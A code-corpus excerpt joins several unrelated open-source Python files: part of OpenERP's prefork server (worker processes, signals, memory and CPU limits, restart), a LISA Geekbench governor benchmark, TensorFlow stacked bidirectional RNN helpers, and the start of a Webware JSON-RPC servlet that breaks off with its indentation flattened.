    def worker_spawn(self, klass, workers_registry):
        """fork() and register a new *klass* worker; the child never returns."""
        self.generation += 1
        worker = klass(self)
        pid = os.fork()
        if pid != 0:
            worker.pid = pid
            self.workers[pid] = worker
            workers_registry[pid] = worker
            return worker
        else:
            worker.run()
            sys.exit(0)

    def long_polling_spawn(self):
        """Spawn the gevent-based longpolling server as a subprocess."""
        nargs = stripped_sys_argv()
        cmd = nargs[0]
        cmd = os.path.join(os.path.dirname(cmd), "openerp-gevent")
        nargs[0] = cmd
        popen = subprocess.Popen([sys.executable] + nargs)
        self.long_polling_pid = popen.pid

    def worker_pop(self, pid):
        """Unregister a dead worker and release its watchdog pipe."""
        if pid == self.long_polling_pid:
            self.long_polling_pid = None
        if pid in self.workers:
            _logger.debug("Worker (%s) unregistered", pid)
            try:
                self.workers_http.pop(pid, None)
                self.workers_cron.pop(pid, None)
                u = self.workers.pop(pid)
                u.close()
            except OSError:
                return

    def worker_kill(self, pid, sig):
        try:
            os.kill(pid, sig)
        except OSError, e:
            if e.errno == errno.ESRCH:
                # no such process: it already died, just unregister it
                self.worker_pop(pid)

    def process_signals(self):
        """Drain the queue filled by signal_handler() and act on each signal."""
        while len(self.queue):
            sig = self.queue.pop(0)
            if sig in [signal.SIGINT, signal.SIGTERM]:
                raise KeyboardInterrupt
            elif sig == signal.SIGHUP:
                # restart on kill -HUP
                openerp.phoenix = True
                raise KeyboardInterrupt
            elif sig == signal.SIGQUIT:
                # dump stacks on kill -3
                self.dumpstacks()
            elif sig == signal.SIGUSR1:
                # log ormcache stats on kill -SIGUSR1
                log_ormcache_stats()
            elif sig == signal.SIGTTIN:
                # increase number of workers
                self.population += 1
            elif sig == signal.SIGTTOU:
                # decrease number of workers
                self.population -= 1

    def process_zombie(self):
        # reap dead workers
        while 1:
            try:
                wpid, status = os.waitpid(-1, os.WNOHANG)
                if not wpid:
                    break
                # exit status 3 is treated as a critical worker failure
                if (status >> 8) == 3:
                    msg = "Critial worker error (%s)"
                    _logger.critical(msg, wpid)
                    raise Exception(msg % wpid)
                self.worker_pop(wpid)
            except OSError, e:
                if e.errno == errno.ECHILD:
                    break
                raise

    def process_timeout(self):
        """SIGKILL workers whose watchdog was not fed within their timeout."""
        now = time.time()
        for (pid, worker) in self.workers.items():
            if worker.watchdog_timeout is not None and \
                    (now - worker.watchdog_time) >= worker.watchdog_timeout:
                _logger.error("Worker (%s) timeout", pid)
                self.worker_kill(pid, signal.SIGKILL)

    def process_spawn(self):
        """Top up the HTTP/cron worker pools to their configured sizes."""
        if config['xmlrpc']:
            while len(self.workers_http) < self.population:
                self.worker_spawn(WorkerHTTP, self.workers_http)
            if not self.long_polling_pid:
                self.long_polling_spawn()
        while len(self.workers_cron) < config['max_cron_threads']:
            self.worker_spawn(WorkerCron, self.workers_cron)

    def sleep(self):
        """Wait up to ``self.beat`` seconds for worker watchdog pings or
        internal wakeups, refreshing each pinging worker's watchdog time."""
        try:
            # map of fd -> worker
            fds = dict([(w.watchdog_pipe[0], w) for k, w in self.workers.items()])
            fd_in = fds.keys() + [self.pipe[0]]
            # check for ping or internal wakeups
            ready = select.select(fd_in, [], [], self.beat)
            # update worker watchdogs
            for fd in ready[0]:
                if fd in fds:
                    fds[fd].watchdog_time = time.time()
                try:
                    # empty pipe
                    while os.read(fd, 1):
                        pass
                except OSError, e:
                    if e.errno not in [errno.EAGAIN]:
                        raise
        except select.error, e:
            if e[0] not in [errno.EINTR]:
                raise

    def start(self):
        # wakeup pipe, python doesnt throw EINTR when a syscall is interrupted
        # by a signal simulating a pseudo SA_RESTART. We write to a pipe in the
        # signal handler to overcome this behaviour
        self.pipe = self.pipe_new()
        # set signal handlers
        signal.signal(signal.SIGINT, self.signal_handler)
        signal.signal(signal.SIGTERM, self.signal_handler)
        signal.signal(signal.SIGHUP, self.signal_handler)
        signal.signal(signal.SIGCHLD, self.signal_handler)
        signal.signal(signal.SIGTTIN, self.signal_handler)
        signal.signal(signal.SIGTTOU, self.signal_handler)
        signal.signal(signal.SIGQUIT, dumpstacks)
        signal.signal(signal.SIGUSR1, log_ormcache_stats)

        if self.address:
            # listen to socket
            _logger.info('HTTP service (werkzeug) running on %s:%s', *self.address)
            self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self.socket.setblocking(0)
            self.socket.bind(self.address)
            self.socket.listen(8 * self.population)

    def stop(self, graceful=True):
        """Stop all workers; gracefully (SIGINT + wait up to self.timeout)
        or forcefully, then SIGTERM whatever is left and close the socket."""
        if self.long_polling_pid is not None:
            # FIXME make longpolling process handle SIGTERM correctly
            self.worker_kill(self.long_polling_pid, signal.SIGKILL)
            self.long_polling_pid = None
        if graceful:
            _logger.info("Stopping gracefully")
            limit = time.time() + self.timeout
            for pid in self.workers.keys():
                self.worker_kill(pid, signal.SIGINT)
            while self.workers and time.time() < limit:
                try:
                    self.process_signals()
                except KeyboardInterrupt:
                    _logger.info("Forced shutdown.")
                    break
                self.process_zombie()
                time.sleep(0.1)
        else:
            _logger.info("Stopping forcefully")
        for pid in self.workers.keys():
            self.worker_kill(pid, signal.SIGTERM)
        if self.socket:
            self.socket.close()

    def run(self, preload, stop):
        """Master loop: reap zombies, kill timed-out workers, respawn the
        pools and sleep, until interrupted by SIGINT/SIGTERM/SIGHUP."""
        self.start()

        rc = preload_registries(preload)

        if stop:
            self.stop()
            return rc

        # Empty the cursor pool, we dont want them to be shared among forked workers.
        openerp.sql_db.close_all()

        _logger.debug("Multiprocess starting")
        while 1:
            try:
                #_logger.debug("Multiprocess beat (%s)",time.time())
                self.process_signals()
                self.process_zombie()
                self.process_timeout()
                self.process_spawn()
                self.sleep()
            except KeyboardInterrupt:
                _logger.debug("Multiprocess clean stop")
                self.stop()
                break
            except Exception, e:
                _logger.exception(e)
                self.stop(False)
                return -1
class Worker(object):
    """ Workers

    Base class for the forked worker processes: runs the
    limit/ping/sleep/work loop and enforces the per-worker resource limits
    (request count, virtual memory, CPU time).
    """
    def __init__(self, multi):
        self.multi = multi
        self.watchdog_time = time.time()
        self.watchdog_pipe = multi.pipe_new()
        # Can be set to None if no watchdog is desired.
        self.watchdog_timeout = multi.timeout
        self.ppid = os.getpid()
        self.pid = None
        self.alive = True
        # should we rename into lifetime ?
        self.request_max = multi.limit_request
        self.request_count = 0

    def setproctitle(self, title=""):
        setproctitle('openerp: %s %s %s' % (self.__class__.__name__, self.pid, title))

    def close(self):
        os.close(self.watchdog_pipe[0])
        os.close(self.watchdog_pipe[1])

    def signal_handler(self, sig, frame):
        # SIGINT: finish the current request, then exit the run() loop
        self.alive = False

    def sleep(self):
        """Block until a connection is pending on the shared socket (or beat)."""
        try:
            select.select([self.multi.socket], [], [], self.multi.beat)
        except select.error, e:
            if e[0] not in [errno.EINTR]:
                raise

    def process_limit(self):
        """Enforce the worker lifetime and resource limits before each request."""
        # If our parent changed sucide
        if self.ppid != os.getppid():
            _logger.info("Worker (%s) Parent changed", self.pid)
            self.alive = False
        # check for lifetime
        if self.request_count >= self.request_max:
            _logger.info("Worker (%d) max request (%s) reached.", self.pid, self.request_count)
            self.alive = False
        # Reset the worker if it consumes too much memory (e.g. caused by a memory leak).
        rss, vms = memory_info(psutil.Process(os.getpid()))
        if vms > config['limit_memory_soft']:
            _logger.info('Worker (%d) virtual memory limit (%s) reached.', self.pid, vms)
            self.alive = False      # Commit suicide after the request.

        # VMS and RLIMIT_AS are the same thing: virtual memory, a.k.a. address space
        soft, hard = resource.getrlimit(resource.RLIMIT_AS)
        resource.setrlimit(resource.RLIMIT_AS, (config['limit_memory_hard'], hard))

        # SIGXCPU (exceeded CPU time) signal handler will raise an exception.
        r = resource.getrusage(resource.RUSAGE_SELF)
        cpu_time = r.ru_utime + r.ru_stime
        def time_expired(n, stack):
            _logger.info('Worker (%d) CPU time limit (%s) reached.', self.pid, config['limit_time_cpu'])
            # We dont suicide in such case
            raise Exception('CPU time limit exceeded.')
        signal.signal(signal.SIGXCPU, time_expired)
        soft, hard = resource.getrlimit(resource.RLIMIT_CPU)
        resource.setrlimit(resource.RLIMIT_CPU, (cpu_time + config['limit_time_cpu'], hard))

    def process_work(self):
        # overridden by subclasses to do the actual unit of work
        pass

    def start(self):
        """Post-fork initialization common to all workers."""
        self.pid = os.getpid()
        self.setproctitle()
        _logger.info("Worker %s (%s) alive", self.__class__.__name__, self.pid)
        # Reseed the random number generator
        random.seed()
        if self.multi.socket:
            # Prevent fd inheritance: close_on_exec
            flags = fcntl.fcntl(self.multi.socket, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
            fcntl.fcntl(self.multi.socket, fcntl.F_SETFD, flags)
            # reset blocking status
            self.multi.socket.setblocking(0)
        signal.signal(signal.SIGINT, self.signal_handler)
        signal.signal(signal.SIGTERM, signal.SIG_DFL)
        signal.signal(signal.SIGCHLD, signal.SIG_DFL)

    def stop(self):
        pass

    def run(self):
        """Main worker loop: check limits, feed the watchdog, wait, work."""
        try:
            self.start()
            while self.alive:
                self.process_limit()
                self.multi.pipe_ping(self.watchdog_pipe)
                self.sleep()
                self.process_work()
            _logger.info("Worker (%s) exiting. request_count: %s, registry count: %s.",
                         self.pid, self.request_count,
                         len(openerp.modules.registry.RegistryManager.registries))
            self.stop()
        except Exception:
            _logger.exception("Worker (%s) Exception occured, exiting..." % self.pid)
            # should we use 3 to abort everything ?
            sys.exit(1)
class WorkerHTTP(Worker):
    """ HTTP Request workers

    accept()s connections on the shared listen socket and serves each one
    through a private BaseWSGIServerNoBind instance.
    """
    def process_request(self, client, addr):
        """Serve one accepted connection through the WSGI server."""
        client.setblocking(1)
        client.settimeout(2)
        client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        # Prevent fd inherientence close_on_exec
        flags = fcntl.fcntl(client, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
        fcntl.fcntl(client, fcntl.F_SETFD, flags)
        # do request using BaseWSGIServerNoBind monkey patched with socket
        self.server.socket = client
        # tolerate broken pipe when the http client closes the socket before
        # receiving the full reply
        try:
            self.server.process_request(client, addr)
        except IOError, e:
            if e.errno != errno.EPIPE:
                raise
        self.request_count += 1

    def process_work(self):
        try:
            client, addr = self.multi.socket.accept()
            self.process_request(client, addr)
        except socket.error, e:
            # EAGAIN: another worker won the accept() race; just retry later
            if e[0] not in (errno.EAGAIN, errno.ECONNABORTED):
                raise

    def start(self):
        Worker.start(self)
        self.server = BaseWSGIServerNoBind(self.multi.app)
class WorkerCron(Worker):
    """ Cron workers

    Each process_work() call polls a single database for due cron jobs,
    cycling round-robin over the databases returned by _db_list().
    """
    def __init__(self, multi):
        super(WorkerCron, self).__init__(multi)
        # process_work() below process a single database per call.
        # The variable db_index is keeping track of the next database to
        # process.
        self.db_index = 0

    def sleep(self):
        # Really sleep once all the databases have been processed.
        if self.db_index == 0:
            interval = SLEEP_INTERVAL + self.pid % 10   # chorus effect
            time.sleep(interval)

    def _db_list(self):
        """Return the database names to poll: the explicit --database list
        when configured, otherwise every database on the server."""
        if config['db_name']:
            db_names = config['db_name'].split(',')
        else:
            db_names = openerp.service.db.exp_list(True)
        return db_names

    def process_work(self):
        """Acquire and run pending cron jobs on one database, then advance
        ``db_index`` to the next database (round-robin)."""
        rpc_request = logging.getLogger('openerp.netsvc.rpc.request')
        rpc_request_flag = rpc_request.isEnabledFor(logging.DEBUG)
        _logger.debug("WorkerCron (%s) polling for jobs", self.pid)
        db_names = self._db_list()
        if len(db_names):
            self.db_index = (self.db_index + 1) % len(db_names)
            db_name = db_names[self.db_index]
            self.setproctitle(db_name)
            if rpc_request_flag:
                start_time = time.time()
                start_rss, start_vms = memory_info(psutil.Process(os.getpid()))

            import openerp.addons.base as base
            base.ir.ir_cron.ir_cron._acquire_job(db_name)
            openerp.modules.registry.RegistryManager.delete(db_name)

            # dont keep cursors in multi database mode
            if len(db_names) > 1:
                openerp.sql_db.close_db(db_name)
            if rpc_request_flag:
                run_time = time.time() - start_time
                end_rss, end_vms = memory_info(psutil.Process(os.getpid()))
                vms_diff = (end_vms - start_vms) / 1024
                logline = '%s time:%.3fs mem: %sk -> %sk (diff: %sk)' % \
                    (db_name, run_time, start_vms / 1024, end_vms / 1024, vms_diff)
                _logger.debug("WorkerCron (%s) %s", self.pid, logline)

            self.request_count += 1
            if self.request_count >= self.request_max and self.request_max < len(db_names):
                # BUG FIX: corrected "dabatases" -> "databases" in the message.
                _logger.error("There are more databases to process than allowed "
                              "by the `limit_request` configuration variable: %s more.",
                              len(db_names) - self.request_max)
        else:
            self.db_index = 0

    def start(self):
        os.nice(10)     # mommy always told me to be nice with others...
        Worker.start(self)
        if self.multi.socket:
            # cron workers do not serve HTTP: drop the inherited listen socket
            self.multi.socket.close()
#----------------------------------------------------------
# start/stop public api
#----------------------------------------------------------

# Singleton server instance: set by start(), used by restart().
server = None
def load_server_wide_modules():
    """Import every server-wide module listed in the --load option,
    logging (but not propagating) any import failure."""
    for m in openerp.conf.server_wide_modules:
        try:
            openerp.modules.module.load_openerp_module(m)
        except Exception:
            msg = ''
            if m == 'web':
                msg = """
The `web` module is provided by the addons found in the `openerp-web` project.
Maybe you forgot to add those addons in your addons_path configuration."""
            _logger.exception('Failed to load server-wide module `%s`.%s', m, msg)
def _reexec(updated_modules=None):
    """reexecute openerp-server process with (nearly) the same arguments

    :param updated_modules: optional list of module names to upgrade on
        restart; appended to the command line as a ``-u`` argument.
    """
    if openerp.tools.osutil.is_running_as_nt_service():
        subprocess.call('net stop {0} && net start {0}'.format(nt_service_name), shell=True)
    exe = os.path.basename(sys.executable)
    args = stripped_sys_argv()
    # BUG FIX: restart() invokes _reexec() without arguments, so
    # updated_modules may be None; ','.join(None) would raise TypeError.
    if updated_modules:
        args += ["-u", ','.join(updated_modules)]
    if not args or args[0] != exe:
        args.insert(0, exe)
    os.execv(sys.executable, args)
def load_test_file_yml(registry, test_file):
    """Run a YAML test file against *registry*, committing or rolling back
    the cursor depending on the --test-commit option."""
    with registry.cursor() as cr:
        openerp.tools.convert_yaml_import(cr, 'base', file(test_file), 'test', {}, 'init')
        if config['test_commit']:
            _logger.info('test %s has been commited', test_file)
            cr.commit()
        else:
            _logger.info('test %s has been rollbacked', test_file)
            cr.rollback()
def load_test_file_py(registry, test_file):
    """Find the already-imported python module matching *test_file*, run its
    unittest2 tests, and report the outcome into the registry's assertion
    report (when it supports it)."""
    # Locate python module based on its filename and run the tests
    test_path, _ = os.path.splitext(os.path.abspath(test_file))
    for mod_name, mod_mod in sys.modules.items():
        if mod_mod:
            mod_path, _ = os.path.splitext(getattr(mod_mod, '__file__', ''))
            if test_path == mod_path:
                suite = unittest2.TestSuite()
                for t in unittest2.TestLoader().loadTestsFromModule(mod_mod):
                    suite.addTest(t)
                _logger.log(logging.INFO, 'running tests %s.', mod_mod.__name__)
                stream = openerp.modules.module.TestStream()
                result = unittest2.TextTestRunner(verbosity=2, stream=stream).run(suite)
                success = result.wasSuccessful()
                if hasattr(registry._assertion_report,'report_result'):
                    registry._assertion_report.report_result(success)
                if not success:
                    _logger.error('%s: at least one error occurred in a test', test_file)
def preload_registries(dbnames):
    """ Preload a registries, possibly run a test file.

    :param dbnames: list of database names to load (may be None/empty)
    :return: the number of databases whose tests reported failures, or -1
        when a database failed to initialize at all
    """
    # TODO: move all config checks to args dont check tools.config here
    config = openerp.tools.config
    test_file = config['test_file']
    dbnames = dbnames or []
    rc = 0
    for dbname in dbnames:
        try:
            update_module = config['init'] or config['update']
            registry = RegistryManager.new(dbname, update_module=update_module)
            # run test_file if provided
            if test_file:
                _logger.info('loading test file %s', test_file)
                with openerp.api.Environment.manage():
                    if test_file.endswith('yml'):
                        load_test_file_yml(registry, test_file)
                    elif test_file.endswith('py'):
                        load_test_file_py(registry, test_file)
            if registry._assertion_report.failures:
                rc += 1
        except Exception:
            _logger.critical('Failed to initialize database `%s`.', dbname, exc_info=True)
            return -1
    return rc
def start(preload=None, stop=False):
    """ Start the openerp http server and cron processor.

    :param preload: passed through to ``server.run()`` (registries to
        preload before serving).
    :param stop: passed through to ``server.run()``; when true the server
        exits after the preload phase.
    :return: the server's exit code, normalized to 0 when falsy.
    """
    global server
    load_server_wide_modules()
    # Pick the server flavour matching the configured concurrency model:
    # gevent when the process is evented, prefork with worker processes,
    # otherwise a plain threaded server.
    if openerp.evented:
        server = GeventServer(openerp.service.wsgi_server.application)
    elif config['workers']:
        server = PreforkServer(openerp.service.wsgi_server.application)
    else:
        server = ThreadedServer(openerp.service.wsgi_server.application)
    if config['auto_reload']:
        autoreload = AutoReload(server)
        autoreload.run()
    rc = server.run(preload, stop)
    # like the legend of the phoenix, all ends with beginnings
    if getattr(openerp, 'phoenix', False):
        modules = []
        if config['auto_reload']:
            modules = autoreload.modules.keys()
        # Re-exec the current process in place to pick up code changes.
        _reexec(modules)
    return rc if rc else 0
def restart():
    """Restart the running server process.

    On POSIX platforms the master process is simply sent SIGHUP, which the
    server handles by re-executing itself.  Windows has no SIGHUP, so the
    re-exec is performed from a separate thread, letting the current thread
    first return its response to the caller.
    """
    if os.name != 'nt':
        os.kill(server.pid, signal.SIGHUP)
    else:
        threading.Thread(target=_reexec).start()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mdigiorgio/lisa | tests/benchmarks/android_geekbench.py | 4 | 3914 | #!/usr/bin/env python
import os
from time import sleep
# The workload class MUST be loaded before the LisaBenchmark
from android import Workload
from android import LisaBenchmark
from devlib.exception import TargetError
class GeekbenchTest(LisaBenchmark):
    """Geekbench benchmark wrapper.

    Runs the Geekbench Android workload once for a given
    ``(governor, test)`` pair, after configuring the target's cpufreq
    governor (and its tunables for schedutil/ondemand).
    """

    # Android Workload to run
    bm_name = 'Geekbench'

    # Default products to be collected
    bm_collect = 'ftrace energy'

    def benchmarkInit(self):
        self.setupWorkload()
        self.setupGovernor()

    def __init__(self, governor, test):
        self.governor = governor
        self.test = test
        super(GeekbenchTest, self).__init__()

    def setupWorkload(self):
        # Create a results folder for each "governor/test"
        # BUG FIX: use the instance attribute instead of the module-level
        # loop variable `governor`, so the class also works when
        # instantiated outside the driver script at the bottom of the file.
        self.out_dir = os.path.join(self.te.res_dir, self.governor)
        try:
            os.stat(self.out_dir)
        except OSError:
            # Directory does not exist yet (narrowed from a bare except so
            # that e.g. KeyboardInterrupt is not silently swallowed).
            os.makedirs(self.out_dir)

        # Setup workload parameters
        self.bm_params = {
            'test_name' : self.test
        }

    def setupGovernor(self):
        try:
            self.target.cpufreq.set_all_governors(self.governor)
        except TargetError:
            self._log.warning('Governor [%s] not available on target',
                              self.governor)
            raise

        # Setup schedutil parameters
        if self.governor == 'schedutil':
            rate_limit_us = 2000
            # Different schedutil versions have different tunables
            tunables = self.target.cpufreq.list_governor_tunables(0)
            if 'rate_limit_us' in tunables:
                tunables = {'rate_limit_us' : str(rate_limit_us)}
            else:
                assert ('up_rate_limit_us' in tunables and
                        'down_rate_limit_us' in tunables)
                tunables = {
                    'up_rate_limit_us' : str(rate_limit_us),
                    'down_rate_limit_us' : str(rate_limit_us)
                }
            try:
                for cpu_id in range(self.te.platform['cpus_count']):
                    self.target.cpufreq.set_governor_tunables(
                        cpu_id, 'schedutil', **tunables)
            except TargetError as e:
                self._log.warning('Failed to set schedutils parameters: {}'\
                                  .format(e))
                raise
            self._log.info('Set schedutil.rate_limit_us=%d', rate_limit_us)

        # Setup ondemand parameters
        if self.governor == 'ondemand':
            try:
                for cpu_id in range(self.te.platform['cpus_count']):
                    tunables = self.target.cpufreq.get_governor_tunables(cpu_id)
                    self.target.cpufreq.set_governor_tunables(
                        cpu_id, 'ondemand',
                        **{'sampling_rate' : tunables['sampling_rate_min']})
            except TargetError as e:
                self._log.warning('Failed to set ondemand parameters: {}'\
                                  .format(e))
                raise
            self._log.info('Set ondemand.sampling_rate to minimum supported')

        # Report configured governor
        governors = self.target.cpufreq.get_all_governors()
        self._log.info('Using governors: %s', governors)
# Run the benchmark in each of the supported governors
governors = [
    'performance',
    'ondemand',
    'interactive',
    'sched',
    'schedutil',
    'powersave',
]

tests = [
    'CPU',
    'COMPUTE'
]

tests_remaining = len(governors) * len(tests)
tests_completed = 0
for governor in governors:
    for test in tests:
        tests_remaining -= 1
        try:
            GeekbenchTest(governor, test)
            tests_completed += 1
        except Exception:
            # A test configuration failed, continue with other tests.
            # BUG FIX: catch Exception instead of a bare `except:` so that
            # KeyboardInterrupt/SystemExit can still abort the whole run.
            pass

# We want to collect data from at least one governor
assert(tests_completed >= 1)
# vim :set tabstop=4 shiftwidth=4 expandtab
| apache-2.0 |
ikaee/bfr-attendant | facerecognitionlibrary/jni-build/jni/include/tensorflow/contrib/rnn/python/ops/rnn.py | 25 | 10321 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""RNN helpers for TensorFlow models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.rnn.python.ops import core_rnn as contrib_rnn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import variable_scope as vs
def stack_bidirectional_rnn(cells_fw,
                            cells_bw,
                            inputs,
                            initial_states_fw=None,
                            initial_states_bw=None,
                            dtype=None,
                            sequence_length=None,
                            scope=None):
  """Creates a bidirectional recurrent neural network.

  Stacks several bidirectional rnn layers. The combined forward and backward
  layer outputs are used as input of the next layer. tf.bidirectional_rnn
  does not allow to share forward and backward information between layers.
  The input_size of the first forward and backward cells must match.
  The initial state for both directions is zero and no intermediate states
  are returned.

  As described in https://arxiv.org/abs/1303.5778

  Args:
    cells_fw: List of instances of RNNCell, one per layer,
      to be used for forward direction.
    cells_bw: List of instances of RNNCell, one per layer,
      to be used for backward direction.
    inputs: A length T list of inputs, each a tensor of shape
      [batch_size, input_size], or a nested tuple of such elements.
    initial_states_fw: (optional) A list of the initial states (one per layer)
      for the forward RNN.
      Each tensor must has an appropriate type and shape
      `[batch_size, cell_fw.state_size]`.
    initial_states_bw: (optional) Same as for `initial_states_fw`, but using
      the corresponding properties of `cells_bw`.
    dtype: (optional) The data type for the initial state.  Required if
      either of the initial states are not provided.
    sequence_length: (optional) An int32/int64 vector, size `[batch_size]`,
      containing the actual lengths for each of the sequences.
    scope: VariableScope for the created subgraph; defaults to None.

  Returns:
    A tuple (outputs, output_state_fw, output_state_bw) where:
      outputs is a length `T` list of outputs (one for each input), which
        are depth-concatenated forward and backward outputs.
      output_states_fw is the final states, one tensor per layer,
        of the forward rnn.
      output_states_bw is the final states, one tensor per layer,
        of the backward rnn.

  Raises:
    TypeError: If `cell_fw` or `cell_bw` is not an instance of `RNNCell`.
    ValueError: If inputs is None, not a list or an empty list.
  """
  if not cells_fw:
    raise ValueError("Must specify at least one fw cell for BidirectionalRNN.")
  if not cells_bw:
    raise ValueError("Must specify at least one bw cell for BidirectionalRNN.")
  if not isinstance(cells_fw, list):
    raise ValueError("cells_fw must be a list of RNNCells (one per layer).")
  if not isinstance(cells_bw, list):
    raise ValueError("cells_bw must be a list of RNNCells (one per layer).")
  if len(cells_fw) != len(cells_bw):
    raise ValueError("Forward and Backward cells must have the same depth.")
  # BUG FIX: validate the initial states themselves.  The original code
  # tested `isinstance(cells_fw, list)` and `len(cells_fw) != len(cells_fw)`
  # (a self-comparison that is always False), so a mismatched or non-list
  # initial_states_fw/bw was silently accepted and failed later with an
  # obscure error.
  if initial_states_fw is not None and (
      not isinstance(initial_states_fw, list) or
      len(initial_states_fw) != len(cells_fw)):
    raise ValueError(
        "initial_states_fw must be a list of state tensors (one per layer).")
  if initial_states_bw is not None and (
      not isinstance(initial_states_bw, list) or
      len(initial_states_bw) != len(cells_bw)):
    raise ValueError(
        "initial_states_bw must be a list of state tensors (one per layer).")

  states_fw = []
  states_bw = []
  prev_layer = inputs

  with vs.variable_scope(scope or "stack_bidirectional_rnn"):
    for i, (cell_fw, cell_bw) in enumerate(zip(cells_fw, cells_bw)):
      initial_state_fw = None
      initial_state_bw = None
      if initial_states_fw:
        initial_state_fw = initial_states_fw[i]
      if initial_states_bw:
        initial_state_bw = initial_states_bw[i]

      with vs.variable_scope("cell_%d" % i) as cell_scope:
        prev_layer, state_fw, state_bw = contrib_rnn.static_bidirectional_rnn(
            cell_fw,
            cell_bw,
            prev_layer,
            initial_state_fw=initial_state_fw,
            initial_state_bw=initial_state_bw,
            sequence_length=sequence_length,
            dtype=dtype,
            scope=cell_scope)
      states_fw.append(state_fw)
      states_bw.append(state_bw)

  return prev_layer, tuple(states_fw), tuple(states_bw)
def stack_bidirectional_dynamic_rnn(cells_fw,
                                    cells_bw,
                                    inputs,
                                    initial_states_fw=None,
                                    initial_states_bw=None,
                                    dtype=None,
                                    sequence_length=None,
                                    parallel_iterations=None,
                                    scope=None):
  """Creates a dynamic bidirectional recurrent neural network.

  Stacks several bidirectional rnn layers. The combined forward and backward
  layer outputs are used as input of the next layer. tf.bidirectional_rnn
  does not allow to share forward and backward information between layers.
  The input_size of the first forward and backward cells must match.
  The initial state for both directions is zero and no intermediate states
  are returned.

  Args:
    cells_fw: List of instances of RNNCell, one per layer,
      to be used for forward direction.
    cells_bw: List of instances of RNNCell, one per layer,
      to be used for backward direction.
    inputs: The RNN inputs. this must be a tensor of shape:
      `[batch_size, max_time, ...]`, or a nested tuple of such elements.
    initial_states_fw: (optional) A list of the initial states (one per layer)
      for the forward RNN.
      Each tensor must has an appropriate type and shape
      `[batch_size, cell_fw.state_size]`.
    initial_states_bw: (optional) Same as for `initial_states_fw`, but using
      the corresponding properties of `cells_bw`.
    dtype: (optional) The data type for the initial state.  Required if
      either of the initial states are not provided.
    sequence_length: (optional) An int32/int64 vector, size `[batch_size]`,
      containing the actual lengths for each of the sequences.
    parallel_iterations: (Default: 32).  The number of iterations to run in
      parallel.  Those operations which do not have any temporal dependency
      and can be run in parallel, will be.  This parameter trades off
      time for space.  Values >> 1 use more memory but take less time,
      while smaller values use less memory but computations take longer.
    scope: VariableScope for the created subgraph; defaults to None.

  Returns:
    A tuple (outputs, output_state_fw, output_state_bw) where:
      outputs: Output `Tensor` shaped:
        `batch_size, max_time, layers_output]`. Where layers_output
        are depth-concatenated forward and backward outputs.
      output_states_fw is the final states, one tensor per layer,
        of the forward rnn.
      output_states_bw is the final states, one tensor per layer,
        of the backward rnn.

  Raises:
    TypeError: If `cell_fw` or `cell_bw` is not an instance of `RNNCell`.
    ValueError: If inputs is `None`.
  """
  if not cells_fw:
    raise ValueError("Must specify at least one fw cell for BidirectionalRNN.")
  if not cells_bw:
    raise ValueError("Must specify at least one bw cell for BidirectionalRNN.")
  if not isinstance(cells_fw, list):
    raise ValueError("cells_fw must be a list of RNNCells (one per layer).")
  if not isinstance(cells_bw, list):
    raise ValueError("cells_bw must be a list of RNNCells (one per layer).")
  if len(cells_fw) != len(cells_bw):
    raise ValueError("Forward and Backward cells must have the same depth.")
  # BUG FIX: validate the initial states themselves.  The original code
  # tested `isinstance(cells_fw, list)` and `len(cells_fw) != len(cells_fw)`
  # (a self-comparison that is always False), so a mismatched or non-list
  # initial_states_fw/bw was silently accepted.
  if initial_states_fw is not None and (
      not isinstance(initial_states_fw, list) or
      len(initial_states_fw) != len(cells_fw)):
    raise ValueError(
        "initial_states_fw must be a list of state tensors (one per layer).")
  if initial_states_bw is not None and (
      not isinstance(initial_states_bw, list) or
      len(initial_states_bw) != len(cells_bw)):
    raise ValueError(
        "initial_states_bw must be a list of state tensors (one per layer).")

  states_fw = []
  states_bw = []
  prev_layer = inputs

  with vs.variable_scope(scope or "stack_bidirectional_rnn"):
    for i, (cell_fw, cell_bw) in enumerate(zip(cells_fw, cells_bw)):
      initial_state_fw = None
      initial_state_bw = None
      if initial_states_fw:
        initial_state_fw = initial_states_fw[i]
      if initial_states_bw:
        initial_state_bw = initial_states_bw[i]

      with vs.variable_scope("cell_%d" % i):
        outputs, (state_fw, state_bw) = rnn.bidirectional_dynamic_rnn(
            cell_fw,
            cell_bw,
            prev_layer,
            initial_state_fw=initial_state_fw,
            initial_state_bw=initial_state_bw,
            sequence_length=sequence_length,
            parallel_iterations=parallel_iterations,
            dtype=dtype)
        # Concat the outputs to create the new input.
        prev_layer = array_ops.concat(outputs, 2)
      states_fw.append(state_fw)
      states_bw.append(state_bw)

  return prev_layer, tuple(states_fw), tuple(states_bw)
| apache-2.0 |
onoga/toolib | toolib/web/kit/JSONRPCServlet.py | 2 | 4091 | """JSON-RPC servlet base class
Written by Jean-Francois Pieronne
"""
DEBUG = 0
import traceback
from MiscUtils import StringIO
try:
import simplejson
except ImportError:
print "ERROR: simplejson is not installed."
print "Get it from http://cheeseshop.python.org/pypi/simplejson"
from WebKit.HTTPContent import HTTPContent
class JSONRPCServlet(HTTPContent):
"""A superclass for Webware servlets using JSON-RPC techniques.
JSONRPCServlet can be used to make coding JSON-RPC applications easier.
Subclasses should override the method exposedMethods() which returns a list
of method names. These method names refer to Webware Servlet methods that
are able to be called by an JSON-RPC-enabled web page. This is very similar
in functionality to Webware's actions.
Some basic security measures against JavaScript hijacking are taken by
default which can be deactivated if you're not dealing with sensitive data.
You can further increase security by adding shared secret mechanisms.
"""
# Class level variables that can be overridden by servlet instances:
_debug = 0 # set to True if you want to see debugging output
# The following variables control security precautions concerning
